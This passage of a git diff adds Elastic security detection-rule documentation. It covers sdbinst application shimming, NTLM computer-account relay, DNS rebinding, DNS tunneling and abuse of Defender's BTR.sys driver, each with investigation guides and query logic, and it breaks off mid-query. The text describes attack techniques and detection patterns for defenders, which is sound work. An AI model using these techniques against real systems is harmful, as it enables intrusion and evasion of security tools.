+ +*Investigating Potential Application Shimming via Sdbinst* + + +Application shimming is a Windows feature designed to ensure software compatibility across different OS versions. However, attackers exploit this by using the `sdbinst.exe` tool to execute malicious code under the guise of legitimate processes, achieving persistence. The detection rule identifies suspicious invocations of `sdbinst.exe` by filtering out benign arguments, flagging potential misuse for further investigation. + + +*Possible investigation steps* + + +- Review the process execution details to confirm the presence of sdbinst.exe with suspicious arguments that do not include the benign flags -m, -bg, or -mm. +- Investigate the parent process of sdbinst.exe to determine if it is a legitimate and expected process or if it is potentially malicious. +- Check the timeline of events around the execution of sdbinst.exe to identify any related or preceding suspicious activities, such as unusual file modifications or network connections. +- Analyze the user account associated with the execution of sdbinst.exe to verify if it is a legitimate user and if there are any signs of account compromise. +- Examine the system for any newly installed or modified application compatibility databases (.sdb files) that could be associated with the suspicious execution of sdbinst.exe. +- Correlate the alert with other security tools and logs, such as Microsoft Defender XDR or Sysmon, to gather additional context and confirm the presence of malicious activity. + + +*False positive analysis* + + +- Legitimate software installations or updates may trigger sdbinst.exe with arguments that are not typically malicious. Users should verify the source and purpose of the software to determine if it is expected behavior. +- System administrators might use sdbinst.exe for deploying compatibility fixes across an organization. In such cases, document these activities and create exceptions for known administrative tasks. +- Some enterprise applications may use sdbinst.exe as part of their normal operation. Identify these applications and exclude their specific command-line arguments from triggering alerts. +- Scheduled tasks or scripts that include sdbinst.exe for maintenance purposes can be a source of false positives. Review these tasks and scripts, and whitelist them if they are part of routine operations. +- Regularly review and update the list of exceptions to ensure that only verified and necessary exclusions are maintained, minimizing the risk of overlooking genuine threats. + + +*Response and remediation* + + +- Isolate the affected system from the network to prevent further malicious activity and lateral movement. +- Terminate any suspicious processes associated with `sdbinst.exe` that do not match known legitimate usage patterns. +- Remove any unauthorized or suspicious application compatibility databases (.sdb files) that may have been installed using `sdbinst.exe`. +- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional malicious files or persistence mechanisms. +- Review and restore any altered system configurations or registry settings to their default or secure state. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems are affected. +- Implement enhanced monitoring and logging for `sdbinst.exe` executions across the network to detect and respond to future attempts at application shimming. + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +*Additional data sources* + + +This rule also supports the following third-party data sources. For setup instructions, refer to the links below: + +- https://ela.st/crowdstrike-integration[CrowdStrike] +- https://ela.st/m365-defender[Microsoft Defender XDR] +- https://ela.st/sentinel-one-cloud-funnel[SentinelOne Cloud Funnel] +- https://ela.st/sysmon-event-1-setup[Sysmon Event ID 1 - Process Creation] +- https://ela.st/audit-process-creation[Windows Process Creation Logs] + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.name : "sdbinst.exe" and + process.args : "?*" and + not (process.args : "-m" and process.args : "-bg") and + not process.args : ( + "-mm", + "?:\\Windows\\appcompat\\cloudsdb\\apppatch.sdb", + "\"?:\\Windows\\appcompat\\cloudsdb\\apppatch.sdb\"", + "?:\\Program Files\\WindowsApps\\Microsoft.ApplicationCompatibilityEnhancements_*\\sdb\\sysMergeInboxStoreApp.sdb", + "\"?:\\Program Files\\WindowsApps\\Microsoft.ApplicationCompatibilityEnhancements_*\\sdb\\sysMergeInboxStoreApp.sdb\"", + "?:\\Program Files\\WindowsApps\\Microsoft.ApplicationCompatibilityEnhancements_*\\sdb\\msiMergeInboxStoreApp.sdb", + "\"?:\\Program Files\\WindowsApps\\Microsoft.ApplicationCompatibilityEnhancements_*\\sdb\\msiMergeInboxStoreApp.sdb\"", + "?:\\Program Files (x86)\\Citrix\\ICA Client\\CitrixWorkspaceLegacySWDA.sdb", + "Citrix Workspace", + "C:\\Program Files\\IIS Express\\iisexpressshim.sdb", + "C:\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Application Shimming +** ID: T1546.011 +** Reference URL: https://attack.mitre.org/techniques/T1546/011/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Application Shimming +** ID: T1546.011 +** Reference URL: https://attack.mitre.org/techniques/T1546/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-computer-account-ntlm-relay-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-computer-account-ntlm-relay-activity.asciidoc new file mode 100644 index 0000000000..bc08727104 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-computer-account-ntlm-relay-activity.asciidoc @@ -0,0 +1,156 @@ +[[prebuilt-rule-8-19-32-potential-computer-account-ntlm-relay-activity]] +=== Potential Computer Account NTLM Relay Activity + +Identifies potential relay activities against a Computer account by identifying authentication events using the computer account coming from from hosts other than the server that owns the account. Attackers may relay the computer account hash after capturing it using forced authentication. + +*Rule type*: eql + +*Rule indices*: + +* logs-system.security* +* logs-windows.forwarded* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/p0dalirius/windows-coerced-authentication-methods +* https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications +* https://attack.mitre.org/techniques/T1187/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Active Directory +* Use Case: Active Directory Monitoring +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Computer Account NTLM Relay Activity* + + + +*Possible investigation steps* + + +- Compare the source.ip to the target server host.ip addresses to make sure it's indeed a remote use of the machine account. +- Examine the source.ip activities as this is the attacker IP address used to relay. +- Review all relevant activities such as services creation, file and process events on the target server within the same period. +- Verify the machine account names that end with a dollar sign ($) to ensure they match the expected hostnames, and investigate any discrepancies. +- Check the network logon types to confirm if they align with typical usage patterns for the identified machine accounts. +- Investigate the context of the source IP addresses that do not match the host IP, looking for any signs of unauthorized access or unusual network activity. +- Correlate the findings with other security logs and alerts to identify any patterns or additional indicators of compromise related to the potential relay attack. + + +*False positive analysis* + + +- Machine accounts performing legitimate network logons from different IP addresses can trigger false positives. To manage this, identify and whitelist known IP addresses associated with legitimate administrative tasks or automated processes. +- Scheduled tasks or automated scripts that use machine accounts for network operations may be flagged. Review and document these tasks, then create exceptions for their associated IP addresses and hostnames. +- Load balancers or proxy servers that alter the source IP address of legitimate authentication requests can cause false alerts. Ensure these devices are accounted for in the network architecture and exclude their IP addresses from the rule. +- Temporary network reconfigurations or migrations might result in machine accounts appearing to log in from unexpected hosts. During such events, temporarily adjust the rule parameters or disable the rule to prevent unnecessary alerts. +- Regularly review and update the list of exceptions to ensure they reflect current network configurations and operational practices, minimizing the risk of overlooking genuine threats. + + +*Response and Remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. + - If the involved server is a Domain Controller, coordinate the isolation of the server with infrastructure and identity teams to contain the threat while preserving service availability and forensic evidence. Prioritize this step if active compromise or attacker persistence is confirmed. +- Reset the domain controller's machine account password, along with any accounts suspected to be compromised or exposed. Ensure strong, unique credentials are used and apply tiered credential hygiene where applicable. +- Analyze recent authentication logs, event logs, and network traffic, focusing on suspicious activity and the source IPs referenced in the alert. Correlate findings to identify any lateral movement or additional compromised systems. +- Strengthen network segmentation, especially between domain controllers, administrative workstations, and critical infrastructure. This limits the attack surface and impedes credential relay or reuse across systems. +- Escalate the incident to the SOC or incident response team to coordinate a full investigation, containment, and recovery plan. Ensure stakeholders are kept informed throughout the response. +- Enhance detection mechanisms by tuning alerts and deploying additional telemetry focused on credential relay patterns, anomalous authentication, and NTLM-related activity. +- Conduct a structured post-incident review, documenting findings, identifying control gaps, and updating playbooks, configurations, or security policies to reduce the likelihood of similar incidents in the future. + + +==== Setup + + + +*Setup* + + +Audit Logon must be enabled to generate the events used by this rule. +Setup instructions: https://ela.st/audit-logon + + +==== Rule query + + +[source, js] +---------------------------------- +authentication where host.os.type == "windows" and event.code in ("4624", "4625") and + winlog.logon.type == "Network" and winlog.event_data.AuthenticationPackageName == "NTLM" and + endswith~(user.name, "$") and user.name != "$" and + source.ip != null and source.ip != "::1" and source.ip != "127.0.0.1" and + + /* Filter for a machine account that matches the hostname */ + startswith~(host.name, substring(user.name, 0, -1)) and + + /* Verify the machine account matches the full hostname, not just a prefix substring */ + (startswith~(substring(user.name, 0, -1), host.name) or startswith~(host.name, concat(substring(user.name, 0, -1), "."))) and + + /* Verify if the Source IP belongs to the host */ + not endswith(string(source.ip), string(host.ip)) and + indexOf(string(host.ip), string(source.ip)) == null and + + /* Exclude self-authentication from multi-homed hosts where the NTLM workstation name matches the machine account */ + not (source.domain != null and + startswith~(user.name, source.domain) and + startswith~(source.domain, substring(user.name, 0, -1))) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Forced Authentication +** ID: T1187 +** Reference URL: https://attack.mitre.org/techniques/T1187/ +* Technique: +** Name: Adversary-in-the-Middle +** ID: T1557 +** Reference URL: https://attack.mitre.org/techniques/T1557/ +* Sub-technique: +** Name: LLMNR/NBT-NS Poisoning and SMB Relay +** ID: T1557.001 +** Reference URL: https://attack.mitre.org/techniques/T1557/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-rebinding-from-public-to-private-address.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-rebinding-from-public-to-private-address.asciidoc new file mode 100644 index 0000000000..46ee454aeb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-rebinding-from-public-to-private-address.asciidoc @@ -0,0 +1,214 @@ +[[prebuilt-rule-8-19-32-potential-dns-rebinding-from-public-to-private-address]] +=== Potential DNS Rebinding from Public to Private Address + +Identifies a client resolving the same public registered domain to both a public IP address and a private, loopback, link-local, unique-local IPv6, or shared address. This includes both address classes being observed at the same timestamp, and a public answer followed within five minutes by a private answer where the minimum TTL across all answer records in the private-answer events is 60 seconds or less. Either pattern is consistent with DNS rebinding that pivots browser or application trust to internal resources. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://owasp.org/www-community/attacks/DNS_Rebinding +* https://portswigger.net/web-security/ssrf + +*Tags*: + +* Domain: Network +* Use Case: Threat Detection +* Use Case: Network Security Monitoring +* Tactic: Initial Access +* Rule Type: ESQL +* Data Source: Network Packet Capture +* Data Source: Network Traffic +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential DNS Rebinding from Public to Private Address* + + +DNS rebinding uses attacker-controlled public names that resolve to internal addresses so a victim browser or client +reaches RFC1918, loopback, link-local, unique-local IPv6, or shared-address targets. This rule alerts on two patterns +for the same client and fully qualified domain name: public and internal addresses whose first observations have the +same timestamp, or a public answer followed by an internal answer within five minutes. Sequential transitions also +require the minimum TTL across all DNS answer records in the private-answer events to be 60 seconds or less. Equal +timestamps often represent a mixed-answer response, but do not prove that the addresses came from one DNS transaction; +parallel A and AAAA events can share a timestamp. Equal-timestamp matches do not require the TTL or five-minute gates. + +`Esql.client_ip` is `client.ip` when present and otherwise `source.ip`. Depending on sensor placement this value may +identify an endpoint, a recursive resolver, a forwarder, or a localhost DNS listener such as `127.0.0.1`. Resolver or +loopback identities can merge many hosts into one bucket. + + +*Possible investigation steps* + + +- Review `dns.question.name`, `dns.question.registered_domain`, `Esql.public_ips`, and `Esql.private_ips` to confirm the + same name resolved to both a public and an internal address. +- Check `Esql.same_timestamp`. A value of `true` means both address classes were first observed at the same timestamp, + but does not establish that they came from one DNS transaction. Compare `Esql.first_public_answer`, + `Esql.first_private_answer`, `Esql.transition_seconds`, and `Esql.min_private_event_ttl` for sequential transitions. + Short transitions and TTL values near zero increase confidence. +- Use `Esql.resolved_ip_observation_count`, `Esql.resolved_ip_count`, `Esql.dataset_values`, and + `Esql.observer_name_values` to assess observation volume, distinct IP cardinality, and the integrations and sensors + that contributed to the alert. +- Identify the requesting client using `Esql.client_ip`. Confirm whether that address is an endpoint rather than a + recursive resolver, forwarder, or localhost DNS service before attributing the activity to one host. +- Determine whether the registered domain is attacker-controlled or a legitimate split-horizon or failover domain. +- Check the requesting host for browser or application connections to the resolved private address immediately after + the private answer. +- Review the targeted internal service for requests carrying the public domain in the HTTP Host header or TLS SNI and + for unauthorized access, state changes, or sensitive-data retrieval. + + +*False positive analysis* + + +- Split-horizon DNS, VPN transitions, service discovery, failover, and hairpin NAT can legitimately cause a public + registered domain to alternate between public and private answers. Confirm the domain and resolver behavior with DNS + administrators. +- Dual-stack names may publish a public IPv4 address and a unique-local IPv6 address under the same question name. +- Security products may intentionally sinkhole suspicious domains to loopback or private addresses with short TTLs. +- Exclude confirmed internal domains, approved sinkholes, and controlled security-testing infrastructure by registered + domain or client only after validation. Do not exclude a resolver address until the originating endpoint is known. + + +*Response and remediation* + + +- Block or sinkhole the queried name at recursive resolvers if it is confirmed malicious. +- Patch or isolate affected internal services reached through the rebound name. +- Restrict outbound DNS for clients that should not resolve arbitrary external names directly. + + +==== Setup + + + +*Setup* + + +This rule requires DNS transaction events from one of the following passive network integrations: + +- Elastic Network Packet Capture (`network_traffic.dns`) in `logs-network_traffic.dns-*` +- Zeek (`zeek.dns`) in `logs-zeek.dns-*` +- Legacy Packetbeat DNS events in `packetbeat-*` + +Enable DNS logging so that `dns.question.registered_domain` and `dns.resolved_ip` are populated. Populate +`dns.answers.ttl` to detect sequential public-to-private transitions; equal-timestamp matches do not require TTL data. + +Place the sensor where it observes endpoint-to-resolver DNS traffic. If the sensor is upstream of a recursive resolver, +or if the captured client is a localhost listener such as `127.0.0.1`, `Esql.client_ip` may identify shared DNS +infrastructure instead of the originating endpoint and can merge answers from many hosts. + +DNS-over-HTTPS (DoH), DNS-over-TLS (DoT), and other encrypted DNS traffic are not visible to packet capture unless the +sensor receives decrypted DNS telemetry or equivalent resolver logs mapped to ECS. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-network_traffic.dns-*, logs-zeek.dns-*, packetbeat-* +| where + ( + data_stream.dataset in ("network_traffic.dns", "zeek.dns") or + event.dataset == "dns" + ) and + dns.question.name is not null and + dns.question.registered_domain is not null and + dns.resolved_ip is not null and + TO_UPPER(dns.response_code) == "NOERROR" and + TO_UPPER(dns.question.type) in ("A", "AAAA") +| eval + Esql.client_ip = COALESCE(client.ip, source.ip), + Esql.dataset = COALESCE(data_stream.dataset, event.dataset) +| where Esql.client_ip is not null +| mv_expand dns.resolved_ip +| eval Esql.is_private = CIDR_MATCH( + dns.resolved_ip, + "0.0.0.0/32", + "10.0.0.0/8", + "100.64.0.0/10", + "127.0.0.0/8", + "169.254.0.0/16", + "172.16.0.0/12", + "192.168.0.0/16", + "::1/128", + "fc00::/7", + "fe80::/10" + ) +| eval + Esql.private_time = CASE(Esql.is_private, @timestamp, null), + Esql.public_time = CASE(not Esql.is_private, @timestamp, null), + Esql.private_event_ttl = CASE(Esql.is_private, MV_MIN(dns.answers.ttl), null), + Esql.private_ip = CASE(Esql.is_private, dns.resolved_ip, null), + Esql.public_ip = CASE(not Esql.is_private, dns.resolved_ip, null) +| stats + Esql.resolved_ip_observation_count = COUNT(*), + Esql.resolved_ip_count = COUNT_DISTINCT(dns.resolved_ip), + Esql.first_public_answer = MIN(Esql.public_time), + Esql.first_private_answer = MIN(Esql.private_time), + Esql.min_private_event_ttl = MIN(Esql.private_event_ttl), + Esql.public_ips = MV_SLICE(VALUES(Esql.public_ip), 0, 100), + Esql.private_ips = MV_SLICE(VALUES(Esql.private_ip), 0, 100), + Esql.dataset_values = MV_SLICE(VALUES(Esql.dataset), 0, 10), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 20) + by Esql.client_ip, dns.question.name, dns.question.registered_domain +| eval + Esql.same_timestamp = Esql.first_public_answer == Esql.first_private_answer, + Esql.transition_seconds = DATE_DIFF("seconds", Esql.first_public_answer, Esql.first_private_answer) +| where + Esql.first_public_answer is not null and + Esql.first_private_answer is not null and + ( + Esql.same_timestamp or + ( + Esql.first_public_answer < Esql.first_private_answer and + Esql.min_private_event_ttl is not null and + Esql.min_private_event_ttl <= 60 and + Esql.transition_seconds <= 300 + ) + ) +| keep Esql.*, dns.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Drive-by Compromise +** ID: T1189 +** Reference URL: https://attack.mitre.org/techniques/T1189/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc new file mode 100644 index 0000000000..297c3fd4aa --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc @@ -0,0 +1,196 @@ +[[prebuilt-rule-8-19-32-potential-dns-tunneling-via-long-and-unique-subdomains]] +=== Potential DNS Tunneling via Long and Unique Subdomains + +Identifies a client generating many unique, unusually long DNS query names to the same registered domain within a five-minute window. Malware DNS tunnels and DNS command-and-control commonly encode data in lengthy subdomain portions under one apex domain. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/ + +*Tags*: + +* Domain: Network +* Use Case: Threat Detection +* Use Case: Network Security Monitoring +* Rule Type: ESQL +* Tactic: Command and Control +* Tactic: Exfiltration +* Data Source: Network Packet Capture +* Data Source: Fortinet +* Data Source: Network Traffic +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential DNS Tunneling via Long and Unique Subdomains* + + +DNS tunneling encodes data in query labels and often produces many unique, unusually long subdomains under a single apex +domain. This rule aggregates network DNS telemetry for that behavioral pattern without relying on threat intelligence +feeds or machine learning jobs. + +Compare overlapping apex domains against the machine learning **DNS Tunneling** rule when that job is enabled. + + +*Possible investigation steps* + + +- Review `Esql.dns_registered_domain`, `Esql.count_distinct_names`, `Esql.unique_name_ratio`, + `Esql.max_subdomain_length`, and sample values in `Esql.sample_names`. +- Inspect `Esql.dns_question_type_values`. TXT, NULL, CNAME, or MX bursts increase confidence; A/AAAA-only activity can + still be tunneling and should not be dismissed on type alone. +- Use `Esql.first_seen`, `Esql.last_seen`, `Esql.dataset_values`, and `Esql.observer_name_values` to establish the event + span and identify the integrations and sensors that contributed to the alert. +- Confirm whether `Esql.client_ip` is a workstation, server, recursive resolver, forwarder, NAT address, or localhost + DNS service. Resolver and localhost sources merge many clients and are a common false-positive pattern. +- Review `Esql.destination_ip_values` to identify the resolver or authoritative destination observed by the sensor. +- Pivot on the same client and apex domain in raw DNS events and look for follow-on process, file, or additional C2 + activity. + + +*False positive analysis* + + +- CDN, cloud load-balancer, certificate, and software-update services often create long hostnames. Confirm the apex + domain reputation and whether the requesting host role normally uses that provider. +- Security or network appliances performing DNS-based reachability or reputation checks can resemble tunneling. Exclude + confirmed appliance addresses after validation. +- Do not create a global resolver exception until the originating endpoint is known; a shared `Esql.client_ip` can hide + a single infected host behind legitimate bulk lookups. + + +*Response and remediation* + + +- Block the apex domain or forwarding from the affected host at recursive resolvers if malicious activity is confirmed. +- Isolate the source host and inspect for tunneling tools or malware initiating the queries. +- Add temporary blocks for the apex domain while scoping additional hosts querying the same name. + + +==== Setup + + + +*Setup* + + +This rule requires DNS transaction events from one of the following sources: + +- Elastic Network Packet Capture (`network_traffic.dns`) in `logs-network_traffic.dns-*` +- Fortinet FortiGate DNS logs (`fortinet_fortigate.log`) in `logs-fortinet_fortigate.log-*` +- Elastic Zeek (`zeek.dns`) in `logs-zeek.dns-*` +- Legacy Packetbeat DNS events in `packetbeat-*` with `event.dataset` set to `dns` + +Place the sensor where it observes endpoint-to-resolver DNS traffic. If the sensor is upstream of a recursive resolver, +or if the captured client is a localhost listener such as `127.0.0.1`, `Esql.client_ip` may identify shared DNS +infrastructure instead of the originating endpoint. + +DNS-over-HTTPS (DoH), DNS-over-TLS (DoT), and other encrypted DNS traffic are not visible to packet capture unless the +sensor receives decrypted DNS telemetry or equivalent resolver logs mapped to ECS. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-network_traffic.dns-*, logs-fortinet_fortigate.log-*, logs-zeek.dns-*, packetbeat-* +| where + ( + data_stream.dataset in ("network_traffic.dns", "fortinet_fortigate.log", "zeek.dns") + or event.dataset == "dns" + ) + and dns.question.name is not null + and dns.question.registered_domain is not null +| eval + Esql.client_ip = COALESCE(client.ip, source.ip), + Esql.dataset = COALESCE(data_stream.dataset, event.dataset), + Esql.dns_question_name = TO_LOWER(dns.question.name), + Esql.dns_registered_domain = TO_LOWER(dns.question.registered_domain), + Esql.dns_question_type = TO_LOWER(dns.question.type), + Esql.subdomain_length = LENGTH(Esql.dns_question_name) - LENGTH(Esql.dns_registered_domain) - 1 +| where + Esql.client_ip is not null + and Esql.subdomain_length >= 50 + and (Esql.dns_question_type is null or Esql.dns_question_type != "ptr") + and not ENDS_WITH(Esql.dns_question_name, ".arpa") +| eval Esql.time_window = DATE_TRUNC(5 minutes, @timestamp) +| stats + Esql.count_queries = COUNT(*), + Esql.count_distinct_names = COUNT_DISTINCT(Esql.dns_question_name), + Esql.max_subdomain_length = MAX(Esql.subdomain_length), + Esql.avg_subdomain_length = AVG(Esql.subdomain_length), + Esql.dns_question_type_values = MV_SLICE(VALUES(Esql.dns_question_type), 0, 9), + Esql.destination_ip_values = MV_SLICE(VALUES(destination.ip), 0, 4), + Esql.sample_names = MV_SLICE(VALUES(Esql.dns_question_name), 0, 4), + Esql.dataset_values = MV_SLICE(VALUES(Esql.dataset), 0, 9), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 19), + Esql.first_seen = MIN(@timestamp), + Esql.last_seen = MAX(@timestamp) + by Esql.time_window, Esql.client_ip, Esql.dns_registered_domain +| where Esql.count_queries >= 25 and Esql.count_distinct_names >= 15 +| eval Esql.unique_name_ratio = TO_DOUBLE(Esql.count_distinct_names) / Esql.count_queries +| keep Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: DNS +** ID: T1071.004 +** Reference URL: https://attack.mitre.org/techniques/T1071/004/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ +* Sub-technique: +** Name: Exfiltration Over Unencrypted Non-C2 Protocol +** ID: T1048.003 +** Reference URL: https://attack.mitre.org/techniques/T1048/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-evasion-via-boot-time-removal-tool.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-evasion-via-boot-time-removal-tool.asciidoc new file mode 100644 index 0000000000..c98126b304 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-evasion-via-boot-time-removal-tool.asciidoc @@ -0,0 +1,206 @@ +[[prebuilt-rule-8-19-32-potential-evasion-via-boot-time-removal-tool]] +=== Potential Evasion via Boot Time Removal Tool + +Identifies creation of a ":changelist" NTFS alternate data stream or a Windows service Args registry value pointing to a ":changelist" path. Microsoft Defender's Boot-Time Removal (BTR.sys) driver reads an RC4-encrypted transaction blob from a driver ADS named ":changelist", referenced by HKLM\SYSTEM\*ControlSet*\Services\*\Args. Adversaries can reproduce this staging outside Defender to abuse BTR.sys as a signed kernel primitive for arbitrary file and registry operations. This rule focuses on non-System writers and excludes Microsoft-signed MRT.exe running as SYSTEM, which may perform related remediation staging. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2026/btr-reforged-weaponizing-defenders-remediation-driver-as-a-kernel-operation-primitive/ +* https://github.com/Dump-GUY/BTR_CLI + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Evasion via Boot Time Removal Tool* + + +Windows Defender's Boot-Time Removal driver (`BTR.sys`) is instructed via an encrypted configuration stored in an +Alternate Data Stream named `:changelist` on a `.sys` image. The service `Args` value under +`HKLM\SYSTEM\*ControlSet*\Services\\Args` points at that ADS path. Check Point Research (BTR Reforged) +showed that the same staging can be performed by non-Defender tooling (for example BTR_CLI) to drive Ring-0 file and +registry actions, including neutralization of security products during early boot. + + +*Possible investigation steps* + + +- Identify whether the alert is a file ADS creation or a service `Args` registry write using `event.category`, + `file.name` / `file.path`, and `registry.path` / `registry.data.strings`. +- Review `process.executable`, `process.name`, `process.pid`, `process.parent.executable`, and `user.id` to determine + whether a Defender component, MRT, or an unexpected user-mode binary staged the `:changelist` artifact. +- For file events, inspect the base `.sys` path (strip `:changelist`), size, hash, and code signature. Confirm whether + the driver was recently dropped under a user-writable path (Downloads, Temp, Desktop) versus a Defender-managed path. +- For registry events, note the service key name under `Services\*` and check sibling values (`ImagePath`, `Type`, + `Group`). Abuse tooling often sets `Group` to `Boot Bus Extender` and may create the service via direct registry + writes / `NtLoadDriver` without a corresponding SCM service-install event (7045). +- Hunt on the same `host.id` for related activity: creation of `*.sys:*.dat` feedback ADS, load of a Microsoft-signed + driver matching BTR, creation/deletion of `\\SystemRoot\\Temp\\BootClean.log` by PID 4, and deletions of security + binaries attributed to System. +- Correlate with other alerts for the same `user.id` and `host.id` in the prior 48 hours for privilege escalation, + driver load, or Defender tampering. + + +*False positive analysis* + + +- Legitimate Defender or MRT reboot remediation may create `:changelist` ADS and related service Args values. This rule + excludes PID 4 and Microsoft-signed `MRT.exe` as SYSTEM; unsigned or differently signed `MRT.exe` still alerts. Rare + Defender paths (for example `MsMpEng.exe`) may still match and should be validated before exceptioning. +- Security research labs intentionally exercising BTR_CLI or similar PoCs will generate true-positive-looking events; + confirm host cohort and change windows. + + +*Response and remediation* + + +- If activity is unexplained: isolate the host, preserve the `.sys` file and `:changelist` stream, export the service + registry key, and capture the staging process tree before cleanup. +- Search the estate for the same `file.name` / ADS pattern, service `Args` values containing `:changelist`, and related + driver hashes. +- Remove unauthorized service keys and staged drivers, restore any deleted security components from known-good media, + and rotate credentials for accounts that held `SeLoadDriverPrivilege` on the host. +- Restrict and monitor assignment/use of `SeLoadDriverPrivilege`; treat signed remediation drivers as LOLDrivers that + require lineage and ADS context monitoring, not signature blocking alone. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-*, logs-endpoint.events.registry-* metadata _id, _version, _index +| where 